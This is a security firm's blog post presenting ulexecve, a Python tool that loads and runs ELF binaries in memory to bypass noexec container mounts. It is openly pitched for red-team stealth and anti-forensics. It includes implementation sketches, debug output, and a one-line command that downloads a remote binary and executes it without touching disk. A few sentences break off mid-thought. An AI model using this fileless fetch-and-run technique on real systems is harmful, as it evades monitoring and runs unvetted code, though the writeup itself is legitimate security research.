By Vincent Berg
TL;DR: If you are familiar with what a userland binary execution tool does and you just want to see the code and/or test it, skip the rest of this post and go to the project's GitHub page.
On a recent engagement I found myself testing a Kubernetes environment. Through application-level bugs I had gotten remote shell access to some of its containers. For further exploration and analysis, I wanted to upload some arbitrary ELF binaries, such as a statically compiled version of `nmap`. To my chagrin, however, the containers were rather locked down. For example, all the writable filesystems were mounted with the `noexec` option. This meant that, although I could upload my binaries successfully there, I could not execute them. The other filesystems were all mounted with the `ro` (read-only) option, so writing anything there was impossible.
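A quick way to see this situation from a Python shell is to classify the mount table. The following is a minimal sketch, not part of the tool: the helper name `restrictive_mounts` is hypothetical, and it assumes input in the usual `/proc/mounts` layout (device, mount point, type, options, ...).

```python
def restrictive_mounts(mounts_text):
    """Classify mount points from /proc/mounts-style text.

    Returns a dict mapping mount point -> "ro", "noexec" or "rw+exec".
    (Hypothetical helper for illustration only.)
    """
    result = {}
    for line in mounts_text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue  # skip empty or malformed lines
        mount_point = fields[1]
        options = fields[3].split(",")
        if "ro" in options:
            result[mount_point] = "ro"          # nothing can be written here
        elif "noexec" in options:
            result[mount_point] = "noexec"      # writable, but not executable
        else:
            result[mount_point] = "rw+exec"     # writable and executable
    return result
```

On a Linux target you could feed it the contents of `/proc/mounts`; if no mount point comes back as `rw+exec`, you are in the scenario described above.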
I still wanted to analyze things further inside the containers and the rest of the Kubernetes environment. I looked and saw that `python` was installed on these container images, so I at least had the ability to execute arbitrary Python code. I managed to use existing Python scripts as well as port some other tools to perform further analysis of the environment that way. It did get me thinking, however, about how useful it would be to execute arbitrary binaries from within Python. Finding a Python interpreter on running containers is, in my experience, a rather common occurrence. If I could just upload ELF binaries (compiled from Rust, Go, C, C++, whatever) and execute them using the Python interpreter, it would make my life a whole lot easier, if only because I would not have to port every tool to Python first.
Before I move on to the implementation details of the userland execution in Python let us first look at what userland execution, more specifically on Linux, actually is.
What is Userland Execution?
Userland execution under Linux means implementing code that roughly replicates what the `execve()` system call does. To quote the function definition as well as its description from the man page:
`#include <unistd.h>`
`int execve(const char *pathname, char *const argv[], char *const envp[]);`
execve() executes the program referred to by pathname. This causes the program that is currently being run by the calling process to be replaced with a new program, with newly initialized stack, heap, and (initialized and uninitialized) data segments.
That is what I need to implement. But let’s first look at the alternative implementations, historical tools and research that preceded my efforts. Linux userland execve tools have a history that goes back roughly two decades. The first solid writeups on this were made by the grugq in “The Design and Implementation of Userland Exec” as well as in another article in Phrack 62 titled “FIST! FIST! FIST! Its all in the wrist: Remote Exec”.
Anti-forensic techniques to execute binaries directly from memory are fairly standard nowadays for anyone wanting to hide their tracks. The binaries never have to be written to any long-term storage: they can reside only in memory and still be executed.
In other words: the idea behind all this is that instead of directly executing a new binary, you replace a currently running process by parsing a binary yourself and then mapping its segments at the right place in memory before transferring execution to the entry point in one of those segments. This is obviously great from a stealth perspective.
Another name for userland execution is reflection. Besides the almost two-decade-old implementations by the grugq, there is a more modern reflection implementation in Rapid7’s mettle. Mettle itself is a native-code Meterpreter version which contains a library named `libreflect`. This library has a utility named `noexec` which attempts to execute a binary via reflection only. However, this tool is written in C and it has the implicit requirement that you transfer the `noexec` binary to the target system and are able to execute it there.
But all these solutions require another ELF binary to do the execution in userland, and obviously this ELF binary is not present in the container scenarios I talked about before. As such I searched for Python-only implementations of a userland execution tool. The only one I could find was named SELF, by Maciej Kotowicz (mak). I could never get this to work and the implementation was rather crude. It seemed more like a proof of concept than anything I could seriously rely on. Looking at it did, however, suggest that it was at least possible to write such a tool in Python.
For the nitty gritty details, I would refer anyone to the code. But the overall approach is as follows. This tool allows you to load arbitrary ELF binaries on Linux systems and execute them without the binaries ever having to touch storage nor using any easily monitored system calls such as execve(). This should make it ideal for red team engagements as well as other anti-forensics purposes.
The design of the tool is fairly straightforward. It only uses standard CPython libraries and includes some backwards compatibility tricks to successfully run on 2.x releases as well as 3.x. When certain library calls are not implemented via libc on the platform this is running on they will be emulated. For example,
It is an explicit design goal of this tool to not have any external dependencies. As such, the assembly generation code is pretty crude, but this was very much preferred over pulling in external code generator libraries. Similarly, splitting this up into versions for different platforms, or making it stealthier by having fewer options or removing all the debug information, is trivially doable for anyone who wants to really integrate this in their red-team tooling, but it is not an explicit goal of this tool itself. If anything, this is a reference implementation that can easily be adapted if you want to make smaller payloads for use in the real world.
ELF binaries are parsed and the `PT_LOAD` segments are mapped into memory. We then must generate a so-called jump buffer. This buffer will contain raw CPU instructions because the newly loaded binary will most likely overwrite parts of the Python process’ memory regions. As such, the moment we hand over control by starting to execute the jump buffer there is no way back: we will either crash and burn or successfully execute the reflected binary (assuming we have everything set up properly).
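To make the parsing step concrete, here is a minimal sketch that extracts the entry point and the `PT_LOAD` program headers using only the standard `struct` module. It is not the tool's own parser: the function name `pt_load_segments` is hypothetical, and the sketch assumes a little-endian 64-bit ELF image.

```python
import struct

PT_LOAD = 1  # program header type for loadable segments

# Field layouts of the ELF64 file header (64 bytes) and program header (56 bytes).
ELF64_EHDR = struct.Struct("<16sHHIQQQIHHHHHH")
ELF64_PHDR = struct.Struct("<IIQQQQQQ")


def pt_load_segments(data):
    """Return (entry_point, list of PT_LOAD segment dicts) for an ELF64 image."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    if data[4] != 2 or data[5] != 1:
        raise ValueError("this sketch only handles little-endian ELF64")
    header = ELF64_EHDR.unpack_from(data, 0)
    entry, phoff = header[4], header[5]        # e_entry, e_phoff
    phentsize, phnum = header[9], header[10]   # e_phentsize, e_phnum
    segments = []
    for index in range(phnum):
        (p_type, p_flags, p_offset, p_vaddr, _p_paddr,
         p_filesz, p_memsz, _p_align) = ELF64_PHDR.unpack_from(
            data, phoff + index * phentsize)
        if p_type != PT_LOAD:
            continue  # only loadable segments need to be mapped
        segments.append({
            "flags": p_flags,
            "offset": p_offset,
            "vaddr": p_vaddr,
            "filesz": p_filesz,
            "memsz": p_memsz,
        })
    return entry, segments
```

A real loader also has to handle 32-bit images, the `PT_INTERP` header for dynamic binaries and malformed input; those are left out here to keep the sketch short.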
The parsing and the buildup of the stack are all standard. Ultimately, we call into a CPU-specific Code Generator. The tool will call `munmap()` for each memory segment in order to unmap any possible Python memory regions. Then `mmap()` calls are generated for each memory segment. The code generator for each CPU simply implements the system calls with the right arguments.
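The "standard" stack buildup refers to the layout a Linux process expects at its entry point: `argc`, the `argv` pointers, a NULL, the `envp` pointers, another NULL, and then the auxiliary vector as (type, value) pairs terminated by `AT_NULL`. The sketch below only illustrates that ordering for a 64-bit little-endian target. The function name `build_initial_stack` is hypothetical, and the pointer values are assumed to already point at strings placed elsewhere.

```python
import struct

AT_NULL = 0  # terminates the auxiliary vector


def build_initial_stack(argv_ptrs, envp_ptrs, auxv, word="<Q"):
    """Pack argc, argv[], NULL, envp[], NULL and the auxv pairs into bytes."""
    words = [len(argv_ptrs)]          # argc
    words.extend(argv_ptrs)           # argv[0] .. argv[argc - 1]
    words.append(0)                   # argv terminator
    words.extend(envp_ptrs)           # environment pointers
    words.append(0)                   # envp terminator
    for key, value in auxv:           # auxiliary vector entries
        words.extend((key, value))
    words.extend((AT_NULL, 0))        # auxv terminator
    return b"".join(struct.pack(word, w) for w in words)
```

The first word of the result is `argc`, which matches the debug output further down in this post, where offset `00000000` of the stack holds `0x2` for `echo hello`.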
We do not always know where the binaries are mapped, for example when they are position-independent binaries. As such, each Code Generator will need to store the result of the main binary `mmap()` in an intermediate register. For example, on `x86-64` we use `%r11`, on x86 `%ecx` and on
aarch64 we use
Then we proceed to do two things. First, we generate `memcpy()` instructions which copy the ELF segments from the temporary Python ctypes buffers into the proper memory locations. Each copy targets the offset parsed from the ELF file, added to the intermediate register mentioned above. Second, we must fix up the auxiliary vector to make sure that entries such as `AT_ENTRY` are properly set up. This ties everything together for dynamic binaries and ensures that the linker can do its job. For more information on this vector please refer to this great LWN article.
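The copy step can be illustrated from inside the interpreter. Note that this swaps in a different technique: the tool emits machine instructions for the copy so that it can run after Python's memory is gone, whereas this sketch simply calls `ctypes.memmove`. The helper name `copy_segment` is hypothetical, and a plain ctypes buffer stands in for the mapped region.

```python
import ctypes


def copy_segment(dest_buf, base_offset, segment_bytes):
    """Copy segment_bytes into dest_buf at base_offset; return the target address."""
    size = len(segment_bytes)
    if base_offset + size > ctypes.sizeof(dest_buf):
        raise ValueError("segment does not fit in the destination mapping")
    # Temporary ctypes buffer holding the segment contents read from the ELF file.
    src = ctypes.create_string_buffer(segment_bytes, size)
    # Destination = base of the mapping + offset parsed from the ELF file.
    dest_addr = ctypes.addressof(dest_buf) + base_offset
    ctypes.memmove(dest_addr, src, size)
    return dest_addr
```

In the generated code the base address lives in the intermediate register rather than in a Python object, but the arithmetic (base plus segment offset) is the same.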
We also forward on any other entries, such as the location of the vDSO (`AT_SYSINFO_EHDR`), from the original process such that any calls by the binary into vDSO land work properly. During my research on why some binaries did not work I investigated this in detail and ended up fixing a bug in Rapid7’s mettle as well (see the pull request).
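To see which entries the original process has, the auxiliary vector can be read from `/proc/self/auxv` on Linux and decoded as a sequence of (type, value) pairs. The following sketch is not the tool's code: `parse_auxv` is a hypothetical helper and it assumes a little-endian platform. The `AT_*` numbers are the standard Linux values.

```python
import struct

# Standard Linux auxiliary vector types used in this post.
AT_NULL, AT_PHDR, AT_BASE, AT_ENTRY, AT_SYSINFO_EHDR = 0, 3, 7, 9, 33


def parse_auxv(raw, word_size=8):
    """Decode raw auxv bytes into a {type: value} dict, stopping at AT_NULL."""
    fmt = "<QQ" if word_size == 8 else "<II"
    pair_size = 2 * word_size
    entries = {}
    for offset in range(0, len(raw) - pair_size + 1, pair_size):
        key, value = struct.unpack_from(fmt, raw, offset)
        if key == AT_NULL:
            break  # end of the vector
        entries[key] = value
    return entries
```

For the current process this could be used as `parse_auxv(open("/proc/self/auxv", "rb").read())`. The value stored under `AT_SYSINFO_EHDR` is the vDSO address that has to be forwarded, while `AT_ENTRY` is one of the entries that must be rewritten for the new binary.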
Once the code generator is done, we have a so-called jump buffer. The script transfers control from Python-land to the jump buffer. The built up instructions will be executed and ultimately the control will be transferred to the newly loaded binary.
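As an illustration of how crude such a code generator can be, the sketch below emits the last few x86-64 instructions of a jump buffer as raw bytes. The three trailing instructions are taken from the objdump excerpt later in this post. The leading `movabs` that loads the entry offset into `%rcx` is an assumption on my part, and `x86_64_entry_jump` is a hypothetical name. Setting up the stack pointer is omitted.

```python
import struct


def x86_64_entry_jump(entry_offset):
    """Emit bytes that jump to %r11 + entry_offset with %rdx cleared."""
    code = b"\x48\xb9" + struct.pack("<Q", entry_offset)  # movabs $imm64,%rcx (assumed)
    code += b"\x4c\x01\xd9"  # add %r11,%rcx   (mapping base + entry offset)
    code += b"\x48\x31\xd2"  # xor %rdx,%rdx   (no atexit handler is passed)
    code += b"\xff\xe1"      # jmpq *%rcx      (hand over control)
    return code
```

Clearing `%rdx` matters because the x86-64 System V ABI lets the process entry point receive a function pointer in that register to register with `atexit`; zero means there is none.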
The tool fully supports static and dynamically compiled executables. Simply pass the filename of the binary to `ulexecve`, followed by any arguments you want to supply to the binary. The environment will be directly copied over from the environment in which you execute `ulexecve`.
ulexecve /bin/ls -lha
You can have it read a binary from `stdin` if you specify `-` as the filename.
cat /bin/ls | ulexecve - -lha
To download a binary into memory and immediately execute it you can use `--download`. This will interpret the filename argument as a URI.
ulexecve --download http://host/binary
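The three input modes above (a path, `-` for standard input, or a URI) all boil down to getting the binary into a bytes object without writing it to disk. A minimal Python 3 sketch of that dispatch could look as follows. The function `load_binary` and its parameters are hypothetical and are not the tool's actual interface.

```python
import sys
import urllib.request


def load_binary(source, download=False, stdin=None):
    """Return the raw bytes of a binary from a URI, from stdin ("-") or from a path."""
    if download:
        # Treat the argument as a URI and keep the response in memory only.
        with urllib.request.urlopen(source) as response:
            return response.read()
    if source == "-":
        # Read the binary from standard input (binary mode).
        stream = stdin if stdin is not None else sys.stdin.buffer
        return stream.read()
    with open(source, "rb") as handle:
        return handle.read()
```

The optional `stdin` parameter only exists so the function can be exercised with an in-memory stream; a tool that also targets Python 2.x would need a different way to obtain a binary stdin.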
Several options are available for debugging: debug information via `--debug`, the built-up stack via `--show-stack`, and the generated jump buffer via `--show-jumpbuf`. The `--jump-delay` option is very useful if you want to parse and map an ELF properly and then attach a debugger to step through the jump buffer and the ultimately executing binary to find the cause of a crash.
cat /bin/echo | ulexecve --debug --show-stack --show-jumpbuf - hello
...
PT_LOAD at offset 0x0002c520: flags=0x6, vaddr=0x2d520, filesz=0x1ad8, memsz=0x1c70
Loaded interpreter successfully
Stack allocated at: 0x7fddf630e000
vDSO loaded at 0x7ffd8952e000 (Auxv entry AT_SYSINFO_EHDR), AT_SYSINFO: 0x00000000
Auxv entries: HWCAP=0x00000002, HWCAP2=0x00000002, AT_CLKTCK=0x00000064
stack contents:
argv
00000000: 0x0000000000000002
00000008: 0x00007fddf6312410
...
Generated mmap call (addr=0x00000000, length=0x00030000, prot=0x7, flags=0x22)
Generated memcpy call (dst=%r11 + 0x00000000, src=0x02534650, size=0x00000fc8)
Generated memcpy call (dst=%r11 + 0x0002d520, src=0x0253d720, size=0x00001ad8)
Generating jumpcode with entry_point=0x00001100 and stack=0x7fddf630e000
Jumpbuf with entry %r11+0x1100 and stack: 0x00007fddf630e000
Written jumpbuf to /tmp/tmphsiaygna.jumpbuf.bin (#592 bytes)
Executing: objdump -m i386:x86-64 -b binary -D /tmp/tmphsiaygna.jumpbuf.bin
...
245: 00 00 00
248: 4c 01 d9 add %r11,%rcx
24b: 48 31 d2 xor %rdx,%rdx
24e: ff e1 jmpq *%rcx
...
Memmove(0x7fddf6f0e000, 0x0254d7f0, 0x00000250)
hello
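The numbers in the generated `mmap` call above can be cross-checked by hand. The sketch below assumes 4 KiB pages and a position-independent binary whose lowest segment starts at offset 0. Whether the tool computes the length exactly this way is an assumption, and `mapping_length` is a hypothetical helper. The constants are the Linux values for the protection and mapping flags.

```python
PAGE_SIZE = 0x1000  # assumption: 4 KiB pages

PROT_READ, PROT_WRITE, PROT_EXEC = 0x1, 0x2, 0x4
MAP_PRIVATE, MAP_ANONYMOUS = 0x02, 0x20  # Linux values


def mapping_length(segments, page_size=PAGE_SIZE):
    """Smallest page-aligned length that covers all (vaddr, memsz) pairs."""
    end = max(vaddr + memsz for vaddr, memsz in segments)
    return (end + page_size - 1) // page_size * page_size
```

With the last segment from the output (`vaddr=0x2d520`, `memsz=0x1c70`) the highest address is `0x2f190`, which rounds up to `0x30000`, the `length` shown in the log. Likewise `prot=0x7` is read, write and execute combined, and `flags=0x22` is `MAP_PRIVATE | MAP_ANONYMOUS`.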
You can find the tool at GitHub or install it via PyPI by running `pip install ulexecve`.
About the Author
Vincent is a founding partner and CTO at Anvil Secure. Vincent’s strong technical background combined with his many years of consulting experience have contributed to the foundational belief that technical excellence and professionalism should be at the core of everything we do at Anvil. As CTO, he guides research and technical content, while maintaining a customer-focused approach.